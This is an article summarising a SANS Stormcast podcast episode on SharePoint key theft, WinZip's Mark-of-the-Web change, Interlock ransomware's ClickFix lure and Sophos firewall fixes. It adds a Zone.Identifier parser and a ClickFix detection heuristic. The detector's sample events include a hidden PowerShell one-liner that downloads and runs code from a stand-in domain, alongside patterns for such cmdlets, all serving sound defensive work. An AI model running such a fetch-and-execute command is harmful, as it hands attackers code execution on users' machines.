
Crucial Cybersecurity Topics Discussed in Latest Stormcast Podcast
In the July 23, 2025 edition of the SANS Internet Storm Center's Stormcast podcast, Johannes Ullrich, recording from Jacksonville, Florida, addresses several critical cybersecurity topics.
The first point discussed concerns the vulnerability of SharePoint, which continues to be exploited. Microsoft recently released an update for SharePoint 2016, in addition to updates already available for the 2019 versions and the subscription edition. Johannes emphasizes the importance of downloading and applying two separate files for these updates: the security patch for SharePoint and the language pack. It is crucial to restart the system after installing the security patch before applying the language pack, as applying both files simultaneously leads to failures.
An often overlooked aspect of this vulnerability is the theft of the system's machine keys. Early exploitation of this flaw aimed to steal these keys, allowing attackers to forge the ViewState and compromise the system again. Johannes stresses that simply applying the patch and removing backdoors or webshells is not enough. It is imperative to rotate the machine keys to avoid re-compromise.
Johannes also addresses a privacy issue related to the use of WinZip 710 or later versions. Traditionally, the "Mark of the Web" on Windows includes a zone identifier indicating that the file was downloaded from the Internet, as well as the download URL. However, WinZip has changed this default behavior to include only the zone identifier, without the URL, to protect user privacy. This feature can be disabled to revert to the previous behavior.
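To make the difference concrete, here is an added example (not code from the podcast or from WinZip) that parses the contents of a Zone.Identifier stream and reports whether it carries only the zone number or also the HostUrl/ReferrerUrl keys that reveal where a file came from. The two sample streams are constructed; `read_motw` opens the `file:Zone.Identifier` alternate data stream and therefore only finds a mark on Windows.

```python
"""Inspect the Mark of the Web (Zone.Identifier) stream on a downloaded file.

Added example, not code from the Stormcast episode. The stream is an INI-style
text block under a [ZoneTransfer] section. ZoneId=3 means "Internet"; tools
that also record the download URL add HostUrl (and often ReferrerUrl) keys,
which is the privacy-relevant part discussed above.
"""
from typing import Optional

# Zone numbers of the Windows URL security zone model.
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}


def parse_zone_identifier(text: str) -> dict:
    """Parse the text of a Zone.Identifier stream.

    Returns a dict with zone_id (int or None), zone_name, host_url and
    referrer_url (None when the key is absent) and has_url (bool).
    """
    values = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, _, val = line.partition("=")
            values[key.strip()] = val.strip()

    zone_id: Optional[int] = None
    try:
        zone_id = int(values["ZoneId"])
    except (KeyError, ValueError):
        pass  # missing or malformed ZoneId: report it as unknown

    host_url = values.get("HostUrl")
    referrer_url = values.get("ReferrerUrl")
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "unknown"),
        "host_url": host_url,
        "referrer_url": referrer_url,
        "has_url": host_url is not None or referrer_url is not None,
    }


def read_motw(path: str) -> Optional[dict]:
    """Read and parse the Zone.Identifier ADS of `path` (Windows only).

    Returns None when the file carries no mark (or on non-Windows systems,
    where the ':' is just part of a file name that does not exist).
    """
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8") as stream:
            return parse_zone_identifier(stream.read())
    except FileNotFoundError:
        return None


# Constructed sample streams: the traditional form that records the URL, and
# the URL-free form that only says the file came from the Internet zone.
SAMPLE_WITH_URL = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/downloads/\r\n"
    "HostUrl=https://example.invalid/downloads/tool.zip\r\n"
)
SAMPLE_ZONE_ONLY = "[ZoneTransfer]\r\nZoneId=3\r\n"


def describe(info: dict) -> str:
    """One-line human summary of a parsed mark."""
    if info["zone_id"] is None:
        return "no usable ZoneId in stream"
    origin = f" from {info['host_url']}" if info["host_url"] else " (no URL recorded)"
    return f"zone {info['zone_id']} ({info['zone_name']}){origin}"


if __name__ == "__main__":
    for label, sample in (("with URL", SAMPLE_WITH_URL), ("zone only", SAMPLE_ZONE_ONLY)):
        print(f"{label:>9}: {describe(parse_zone_identifier(sample))}")
```

Running the script shows the first sample exposing the full download URL while the second reveals only that the file came from the Internet zone; in both cases Windows still applies the zone-based handling, so the privacy change costs no protection.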
The podcast also mentions a detailed report from the FBI and other government agencies on Interlock ransomware. This report provides practical information on detecting and preventing this type of ransomware, which often spreads in the form of fake browser updates. Attackers also use the "ClickFix" technique, where users are prompted to copy and paste PowerShell code, under the pretext of bypassing a CAPTCHA to access the next page.
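The defining trace of a ClickFix paste-and-run is a script interpreter started by the user's shell (the Run dialog lives under explorer.exe) with flags that hide the window or fetch and evaluate remote content. The following added example, which is not from the advisory or the podcast, scores constructed process-creation events against that pattern; field names and thresholds are assumptions, so map them onto whatever your EDR or Sysmon telemetry provides.

```python
"""Heuristic triage of process-creation events for ClickFix-style paste-and-run.

Added example, not from the Interlock advisory or the podcast. Each event is
scored on (a) an interpreter being launched from explorer.exe, which is what
the Win+R Run dialog produces, and (b) command-line traits typical of pasted
one-liners. Sample events below are constructed and use a reserved domain.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")
PASTE_PARENTS = ("explorer.exe",)  # Run dialog launches appear under explorer.exe

# Command-line traits, each with the reason string reported when it matches.
SUSPICIOUS_FLAGS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"(?i)(^|\s)-(w|win|windowstyle)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)(^|\s)-(ep|executionpolicy)\s+bypass"), "execution policy bypass"),
    (re.compile(r"(?i)\b(iwr|invoke-webrequest|downloadstring|invoke-expression|iex)\b"), "download/eval cmdlet"),
    (re.compile(r"(?i)https?://"), "remote URL"),
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: ProcEvent) -> Tuple[int, List[str]]:
    """Return (score, reasons). Non-interpreter processes always score 0."""
    reasons: List[str] = []
    if _basename(ev.image) not in INTERPRETERS:
        return 0, reasons
    if _basename(ev.parent_image) in PASTE_PARENTS:
        reasons.append("interpreter launched from explorer.exe (Run dialog)")
    for pattern, label in SUSPICIOUS_FLAGS:
        if pattern.search(ev.command_line):
            reasons.append(label)
    return len(reasons), reasons


def is_clickfix_candidate(ev: ProcEvent, threshold: int = 3) -> bool:
    """True when enough independent traits line up; threshold is an assumption."""
    return score_event(ev)[0] >= threshold


# Constructed sample telemetry (not real incident data).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -ep bypass -c "iwr https://example.invalid/verify | iex"'),
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell"),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        score, reasons = score_event(ev)
        verdict = "ALERT" if is_clickfix_candidate(ev) else "ok"
        print(f"{verdict:5} score={score} {_basename(ev.image)} <- {_basename(ev.parent_image)}")
        for r in reasons:
            print(f"       - {r}")
```

Only the first event crosses the threshold; a scheduled script started by a service and an interactive PowerShell opened from the Run dialog with no arguments stay below it, which is the point of requiring several traits to coincide rather than alerting on any one of them.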
Finally, Johannes discusses updates from Sophos for its firewalls, fixing five vulnerabilities, two of which are classified as critical. The first is an arbitrary file write vulnerability that can lead to code execution without authentication, and the second is an SQL injection vulnerability in the transparent SMTP proxy, a legacy feature. These vulnerabilities affect specific configurations, but it is recommended to update systems to avoid any risk.
In conclusion, this edition of the podcast provides valuable information and practical advice for cybersecurity professionals, emphasizing the importance of updates and good security practices.
Source: https://www.youtube.com/watch?v=7P0-7eof_Pw
Tags: Cybersecurity, Vulnerabilities, Ransomware, Privacy